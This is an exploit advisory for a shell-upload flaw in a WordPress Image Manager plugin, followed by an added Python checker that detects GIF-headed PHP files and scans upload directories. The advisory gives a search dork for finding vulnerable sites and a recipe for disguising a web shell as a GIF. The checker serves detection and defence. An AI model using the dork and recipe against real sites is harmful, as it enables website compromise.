WordPress Plugin Image Manager - Arbitrary File Upload

EDB-ID: 10325
CVE: N/A
Author: DigitALL
Type: webapps
Platform: PHP
Published: 2009-12-05

# Exploit Title: WordPress Image Manager Plugin Shell Upload Vulnerability

# Version: No specific version; all WordPress systems

# Thanks ; Zombie KroNickq and All 1923Turk.biz Members
# Special Thanks ; Cyb3rking

Dork: inurl:"/plugins/ImageManager/manager.php"

/plugins/ImageManager/manager.php

Put this at the top of your shell:

GIF89a;
<?
-----
?>

Then upload your shell. The uploaded file goes to /demo_images/.
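
For defenders, the following is an added example (not part of the original advisory or the plugin's code) of a check that rejects the kind of file described above, one that begins with a GIF header but carries a PHP open tag, and that sweeps an upload directory such as /demo_images/ for files already stored. The function names, the extension list and the sample bytes are assumptions constructed for illustration.

```python
import os
import re

# Extensions a PHP-enabled server may execute (assumed list for this example).
EXECUTABLE_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)
# "<?php", "<?=" and the bare short tag "<?" that the advisory's file uses.
PHP_OPEN_TAG = re.compile(rb"<\?(php|=|\s|$)", re.IGNORECASE)
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n")


def inspect_upload(filename, data):
    """Return the reasons to reject an upload; an empty list means it passed."""
    reasons = []
    # Catches "x.php" and double extensions such as "x.php.gif".
    if EXECUTABLE_EXT.search(filename):
        reasons.append("executable-extension")
    # A valid magic number alone proves nothing: the advisory's file has one.
    if not data.startswith(IMAGE_MAGIC):
        reasons.append("not-an-image")
    # Heuristic: may rarely match compressed image data, so review hits.
    if PHP_OPEN_TAG.search(data):
        reasons.append("php-open-tag")
    return reasons


def scan_upload_dir(root):
    """Walk an upload directory and map each suspicious path to its reasons."""
    findings = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                reasons = inspect_upload(name, fh.read())
            if reasons:
                findings[path] = reasons
    return findings


# Constructed samples: a GIF header followed by a PHP short tag, and a bare GIF.
POLYGLOT = b"GIF89a;\n<?\n/* placeholder body */\n?>\n"
CLEAN_GIF = b"GIF89a\x01\x00\x01\x00\x00\x00\x00;"

if __name__ == "__main__":
    for name, data in [("a.gif", POLYGLOT), ("a.php", POLYGLOT), ("b.gif", CLEAN_GIF)]:
        print(name, inspect_upload(name, data) or "ok")
```

Content checks like this complement, rather than replace, storing uploads in a location where the web server will not execute them.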